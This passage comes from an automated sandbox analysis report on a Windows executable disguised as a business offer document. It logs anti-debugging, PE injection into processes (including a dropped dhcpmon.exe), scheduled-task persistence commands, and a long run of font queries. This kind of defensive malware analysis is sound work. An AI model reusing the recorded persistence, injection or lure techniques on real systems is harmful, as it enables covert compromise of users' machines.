Anti Debugging:

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Memory written: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process created: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmpAD4D.tmp'	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
